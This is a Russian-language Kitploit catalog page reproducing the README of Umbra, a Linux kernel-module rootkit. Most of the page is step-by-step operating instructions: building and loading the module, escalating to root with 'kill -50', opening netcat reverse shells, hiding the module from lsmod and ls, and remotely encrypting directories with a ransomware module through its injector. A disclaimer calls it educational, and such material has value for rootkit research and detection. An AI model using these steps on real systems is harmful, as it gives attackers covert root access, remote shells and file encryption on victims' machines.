Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Umbra — LKM-руткит, нацеленный на версии ядра 4.x и 5.x, который открывает бэкдор, позволяющий запускать reverse shell на удалённом хосте, выполнять вредоносное ПО и многое другое. | Kitploit
Инструменты/GitHubGitHub/h3xduck/umbra
Повышение привилегийИнструменты шифрования/дешифрованияМеханизмы персистентностиОбход IDS/IPSПост-эксплуатацияКомандование и УправлениеОбучение и ОбразованиеРазработка Полезной НагрузкиТроян Удаленного Доступа
GitHubh3xduck/umbra

Umbra

LKM-руткит, нацеленный на версии ядра 4.x и 5.x, который открывает бэкдор, позволяющий запускать reverse shell на удалённом хосте, выполнять вредоносное ПО и многое другое.

1362754 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

GitHub release (latest by date including pre-releases) Maintainability GitHub code size in bytes GitHub last commit

Umbra

Umbra — это экспериментальный LKM-руткит с удалённым управлением для ядер 4.x и 5.x (до 5.7), который открывает сетевой бэкдор, позволяющий запускать reverse-оболочки на удалённых хостах, удалённо запускать вредоносное ПО и многое другое.

Руткит всё ещё находится в разработке, хотя перечисленные ниже функции уже полностью работоспособны.

Backdoor in action

Примечание: этот руткит был разработан и протестирован с использованием ядра 5.4.0 и Ubuntu 18.04.

Features

  • 🌟 Бэкдор, который запускает reverse-оболочку на удалённый IP после получения вредоносного TCP-пакета.
  • 🌟 Используйте Umbra Injector для удалённого управления руткитом:
    • Удалённая reverse-оболочка.
    • Скрытие/отображение руткита удалённо.
    • Запуск Umbra Modules.
  • НОВОЕ: Добавлены Umbra Modules — специальные модули, похожие на вредоносное ПО, которые расширяют возможности Umbra и могут запускаться удалённо через Umbra Injector.
  • НОВОЕ: Модуль Umbra «Ransom», который превращает Umbra в удалённо управляемый ransomware.

Ransom module in action

  • Umbra скрывает все свои файлы и каталоги от пользовательских команд, таких как ls.
  • Umbra может скрывать/отображать себя удалённо и локально с помощью сигналов.
  • Повышение привилегий путём отправки сигнала 50.
  • Запуск netcat reverse-оболочки при загрузке модуля.
  • Запуск netcat reverse-оболочки на удалённом хосте путём отправки сигнала 51.

Больше функций появится в последующих обновлениях.

Disclaimer

Этот руткит предназначен исключительно для образовательных целей. Я не несу ответственности за любой ущерб, возникший в результате его непреднамеренного использования.

Также имейте в виду, что Umbra включает в себя лишь лёгкие механизмы скрытия и защиты. Он не предназначен для использования в реальных сценариях.

ВАЖНО: Если вы собираетесь тестировать этот руткит на своей машине, я настоятельно рекомендую использовать виртуальную машину.

О модулях Umbra: модуль ransom использует тривиальный механизм шифрования, но он может и обязательно зашифрует любую папку на вашей машине. Хотя файлы можно легко расшифровать, я точно не рекомендую запускать его против вашего корневого каталога или чего-то подобного, кроме как в контролируемой среде.

Table of Contents

  1. Сборка и установка
  2. Выгрузка Umbra
  3. Локальное управление
  4. Umbra Injector: удалённое управление
  5. Модули Umbra
    • (НОВОЕ) Ransom
  6. Ссылки

Build and install

Помните, что у вас должно быть доступно ядро 4.x или 5.x.

  1. Загрузите файлы заголовков вашего ядра
root@kitploit:~
apt install linux-headers-$(uname -r)
  1. Настройте путь include так, чтобы он охватывал каталог заголовков ядра (обычно в /usr/src). Если вы используете vscode, вы можете посмотреть .vscode/c_cpp_properties.json в качестве примера того, какие каталоги следует включить.

  2. Клонируйте проект

root@kitploit:~
git clone https://github.com/h3xduck/Umbra.git
cd Umbra
  1. Соберите Umbra
root@kitploit:~
make
  1. Загрузите Umbra в ядро и настройте окружение Скрипт установит Umbra в ядро и настроит специальный каталог для хранения модулей вредоносного ПО. Этот каталог впоследствии будет скрыт руткитом.
root@kitploit:~
sudo ./install.sh

Если вы уже запускали скрипт ранее и хотите просто установить Umbra в ядро, вы можете выполнить:

root@kitploit:~
sudo insmod ./umbra.ko

Unloading Umbra

Убедитесь, что Umbra не находится в невидимом режиме, иначе это не сработает.

root@kitploit:~
sudo rmmod umbra

Basic Usage: Local control

Повышение привилегий текущего пользователя до root

  • Отправьте сигнал 50 любому PID.
root@kitploit:~
kill -50 1

Запуск reverse netcat-оболочки на IP:PORT

  • Укажите желаемые IP и порт в CONFIG.H перед сборкой руткита. По умолчанию 127.0.0.1:5888

  • Начните прослушивание на удалённом хосте.

root@kitploit:~
nc -lvp 5888
  • Отправьте сигнал 51 любому PID. Umbra перехватит его и запустит оболочку.
root@kitploit:~
kill -51 1

Примечание: Umbra также пытается запустить reverse-оболочку при загрузке.

Скрытие руткита — невидимый режим

Это предотвратит отображение руткита такими командами, как lsmod, или его удаление через rmmod.

root@kitploit:~
kill -52 1

Отображение руткита

Это отменяет невидимый режим, если он активен.

root@kitploit:~
kill -53 1

Umbra Injector: Remote control

Получение reverse-оболочки через бэкдор

Umbra Injector можно запускать как до установки Umbra (в этом случае оболочка будет получена сразу после его установки), так и после установки Umbra на целевой системе.

root@kitploit:~
./injector -S 127.0.0.1

Бэкдор прослушивает пакеты со следующей полезной нагрузкой: UMBRA_PAYLOAD_GET_REVERSE_SHELL.

Вы также можете собрать собственный инжектор, используя мою библиотеку RawTCP.

Удалённое скрытие руткита — невидимый режим

Это предотвратит отображение руткита такими командами, как lsmod, или его удаление через rmmod.

root@kitploit:~
./injector -i 127.0.0.1

Удалённое отображение руткита

Это отменяет невидимый режим, если он активен.

root@kitploit:~
./injector -u 127.0.0.1

Справка

Полную информацию о том, как запустить Umbra Injector, можно получить с помощью:

root@kitploit:~
./injector -h

Umbra Modules

Модули Umbra будут сохранены скриптом install.sh в /tmp/umbra, где Umbra их скроет. Каталог не будет виден таким командам, как ls и подобным.

Модуль Ransom

Этот модуль может запускать удалённые атаки, подобные ransomware, через Umbra Injector. Зашифрованные файлы получают расширение .ubr.

В настоящее время механизм шифрования представляет собой простой поразрядный NOP в качестве демонстрации концепции. Вы можете отредактировать модуль, чтобы добавить собственный алгоритм шифрования.

Шифрование каталога и всех его подкаталогов

root@kitploit:~
./injector -p /Your/Path/To/Encrypt -e 127.0.0.1

Расшифровка каталога и всех его подкаталогов

root@kitploit:~
./injector -p /Your/Path/To/Decrypt -d 127.0.0.1

References

Разработка этого руткита потребовала значительного объёма исследований по LKM и методам руткитов. Ниже приведён неполный список ресурсов, которые я использовал: Как создавать LKM:

  • https://sysprog21.github.io/lkmpg/

Справочник по системным вызовам Linux:

  • https://syscalls64.paolostivanin.com/

Некоторые материалы по руткитам:

  • https://xcellerator.github.io/posts/
  • https://web.archive.org/web/20160620231623/http://big-daddy.fr/repository/Documentation/Hacking/Security/Malware/Rootkits/writing-rootkit.txt
  • https://github.com/f0rb1dd3n/Reptile

License

Этот проект распространяется под лицензией GPLv2. См. LICENSE

Скачать инструмент